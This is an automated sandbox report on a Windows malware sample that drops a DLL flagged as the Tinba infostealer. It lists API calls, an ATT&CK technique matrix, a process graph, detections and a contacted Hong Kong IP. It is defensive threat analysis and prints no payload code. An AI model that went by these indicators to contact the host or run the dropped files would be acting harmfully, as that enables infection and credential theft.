Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C8F26D0 ExitProcess,ProcessPrng,GetCurrentProcessId,ProcessPrng,ProcessPrng,CreateNamedPipeW,GetLastError,CloseHandle,CloseHandle,ReadFileEx,SleepEx,GetLastError,7_2_6C8F26D0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C874C20 GetProcessTimes,GetSystemTimes,GetProcessIoCounters,OpenProcessToken,GetTokenInformation,GetProcessHeap,HeapAlloc,GetTokenInformation,CloseHandle,NtQueryInformationProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,memcpy,ReadProcessMemory,ReadProcessMemory,VirtualQueryEx,memset,GetModuleFileNameExW,K32GetModuleFileNameExW,7_2_6C874C20
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C86F450 memset,RtlGetVersion,7_2_6C86F450

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Native API		1
DLL Side-Loading		1
DLL Side-Loading		1
Disable or Modify Tools		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		1
Ingress Tool Transfer		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts12
Command and Scripting Interpreter		1
Windows Service		1
Windows Service		1
Deobfuscate/Decode Files or Information		LSASS Memory15
System Information Discovery		Remote Desktop ProtocolData from Removable Media22
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Scheduled Task/Job		1
Scheduled Task/Job		212
Process Injection		3
Obfuscated Files or Information		Security Account Manager1
Network Share Discovery		SMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts1
PowerShell		Login Hook1
Scheduled Task/Job		1
DLL Side-Loading		NTDS121
Security Software Discovery		Distributed Component Object ModelInput Capture2
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Masquerading		LSA Secrets1
Process Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
Virtualization/Sandbox Evasion		Cached Domain Credentials21
Virtualization/Sandbox Evasion		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items212
Process Injection		DCSync1
Application Window Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Regsvr32		Proc Filesystem2
System Owner/User Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583995 Sample: eXIHsSYhOX.exe Startdate: 04/01/2025 Architecture: WINDOWS Score: 100 68 18.31.95.13.in-addr.arpa 2->68 74 Suricata IDS alerts for network traffic 2->74 76 Malicious sample detected (through community Yara rule) 2->76 78 Multi AV Scanner detection for dropped file 2->78 80 4 other signatures 2->80 13 eXIHsSYhOX.exe 2 2->13         started        16 regsvr32.exe 2->16         started        signatures3 process4 file5 64 C:\Users\user\AppData\...\eXIHsSYhOX.tmp, PE32 13->64 dropped 18 eXIHsSYhOX.tmp 3 3 13->18         started        21 regsvr32.exe 16->21         started        process6 file7 54 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 18->54 dropped 24 cmd.exe 1 18->24         started        82 Suspicious powershell command line found 21->82 26 powershell.exe 21->26         started        signatures8 process9 signatures10 29 eXIHsSYhOX.exe 2 24->29         started        32 conhost.exe 24->32         started        34 timeout.exe 1 24->34         started        84 Loading BitLocker PowerShell Module 26->84 36 conhost.exe 26->36         started        process11 file12 66 C:\Users\user\AppData\...\eXIHsSYhOX.tmp, PE32 29->66 dropped 38 eXIHsSYhOX.tmp 23 6 29->38         started        process13 file14 56 C:\Users\user\AppData\Roaming\is-SF7GG.tmp, PE32 38->56 dropped 58 C:\Users\user\...\BurlySparrow.dll (copy), PE32 38->58 dropped 60 C:\Users\user\AppData\...\unins000.exe (copy), PE32 38->60 dropped 62 2 other files (none is malicious) 38->62 dropped 41 regsvr32.exe 38->41         started        process15 dnsIp16 70 103.97.176.69, 443, 49736, 53050 ANCHGLOBAL-AS-APAnchnetAsiaLimitedHK Hong Kong 41->70 72 127.0.0.1 unknown unknown 41->72 86 System process connects to network (likely due to code injection or exploit) 41->86 88 Suspicious powershell command line found 41->88 90 Contains functionality to inject code into remote processes 41->90 92 Uses Register-ScheduledTask to add task schedules 41->92 45 powershell.exe 37 41->45         started        48 powershell.exe 37 41->48         started        signatures17 process18 signatures19 94 Loading BitLocker PowerShell Module 45->94 50 conhost.exe 45->50         started        52 conhost.exe 48->52         started        process20

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
eXIHsSYhOX.exe53%VirustotalBrowse
eXIHsSYhOX.exe45%ReversingLabsWin32.Trojan.CrypterX

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\is-14VP5.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-14VP5.tmp\_isetup\_setup64.tmp0%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\is-FHHU1.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-FHHU1.tmp\_isetup\_setup64.tmp0%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp1%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp1%VirustotalBrowse
C:\Users\user\AppData\Local\is-L5KBT.tmp0%ReversingLabs
C:\Users\user\AppData\Local\unins000.exe (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\BurlySparrow.dll (copy)65%ReversingLabsWin32.Infostealer.Tinba
C:\Users\user\AppData\Roaming\is-SF7GG.tmp65%ReversingLabsWin32.Infostealer.Tinba

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
18.31.95.13.in-addr.arpa
unknown
unknownfalse
    		high

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUeXIHsSYhOX.exefalse
      		high
      http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.1818056644.0000000005DED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1862302004.00000000050BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2001806142.000000000623C000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000011.00000002.1982918321.0000000005319000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://go.microregsvr32.exe, 00000007.00000003.1775901750.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889000583.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1759503664.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1756577607.0000000004189000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1774948229.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917563598.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1888311741.0000000004190000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1758105092.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1750414268.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1772234354.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1751777281.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1758205297.000000000418C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1774741083.0000000004190000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1749875575.0000000004191000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000011.00000002.1982918321.0000000005319000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000008.00000002.1809903757.0000000004ED5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1852228572.0000000004184000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1982918321.0000000005319000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://aka.ms/pscore6lBpowershell.exe, 00000008.00000002.1809903757.0000000004D81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1852228572.0000000004051000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1982918321.00000000051D1000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://crl.microsoftpowershell.exe, 0000000A.00000002.1868255401.0000000006C70000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1978277897.0000000003387000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000011.00000002.1982918321.0000000005319000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://www.remobjects.com/pseXIHsSYhOX.exe, 00000000.00000003.1660219416.00000000034D0000.00000004.00001000.00020000.00000000.sdmp, eXIHsSYhOX.exe, 00000000.00000003.1660568722.000000007F0BB000.00000004.00001000.00020000.00000000.sdmp, eXIHsSYhOX.tmp, 00000001.00000000.1662025483.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, eXIHsSYhOX.tmp, 00000006.00000000.1692249801.0000000000DDD000.00000020.00000001.01000000.00000006.sdmp, eXIHsSYhOX.tmp.0.drfalse
                        		high
                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000008.00000002.1809903757.0000000004ED5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1852228572.0000000004184000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1982918321.0000000005319000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://contoso.com/powershell.exe, 00000011.00000002.2001806142.000000000623C000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.1818056644.0000000005DED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1862302004.00000000050BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2001806142.000000000623C000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://www.innosetup.com/eXIHsSYhOX.exe, 00000000.00000003.1660219416.00000000034D0000.00000004.00001000.00020000.00000000.sdmp, eXIHsSYhOX.exe, 00000000.00000003.1660568722.000000007F0BB000.00000004.00001000.00020000.00000000.sdmp, eXIHsSYhOX.tmp, 00000001.00000000.1662025483.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, eXIHsSYhOX.tmp, 00000006.00000000.1692249801.0000000000DDD000.00000020.00000001.01000000.00000006.sdmp, eXIHsSYhOX.tmp.0.drfalse
                                		high
                                https://contoso.com/Licensepowershell.exe, 00000011.00000002.2001806142.000000000623C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://contoso.com/Iconpowershell.exe, 00000011.00000002.2001806142.000000000623C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://docs.rs/getrandom#nodejs-es-module-supportregsvr32.exe, regsvr32.exe, 0000000E.00000002.2029086598.000000006C955000.00000002.00000001.01000000.00000007.sdmpfalse
                                      		high
                                      http://go.microsoft.cregsvr32.exe, 00000007.00000003.1775901750.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889000583.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1759503664.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1756577607.0000000004189000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1774948229.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917563598.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1888311741.0000000004190000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1758105092.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1750414268.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1772234354.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1751777281.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1758205297.000000000418C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1774741083.0000000004190000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1749875575.0000000004191000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000008.00000002.1809903757.0000000004D81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1852228572.0000000004051000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1982918321.00000000051D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://github.com/Pester/Pesterpowershell.exe, 00000011.00000002.1982918321.0000000005319000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            103.97.176.69
                                            		unknownHong Kong
                                            		137443ANCHGLOBAL-AS-APAnchnetAsiaLimitedHKtrue

                                            Private

                                            IP
                                            127.0.0.1

                                            General Information

                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1583995
                                            Start date and time:2025-01-04 01:21:07 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 8m 38s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:20
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:eXIHsSYhOX.exe
                                            renamed because original name is a hash value
                                            Original Sample Name:9170086e8d746e094ab4fe7444613030.exe
                                            Detection:MAL
                                            Classification:mal100.evad.winEXE@26/22@1/2
                                            EGA Information:
                                            • Successful, ratio: 75%
                                            HCA Information:
                                            • Successful, ratio: 80%
                                            • Number of executed functions: 86
                                            • Number of non-executed functions: 178
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe

                                            Warnings

                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
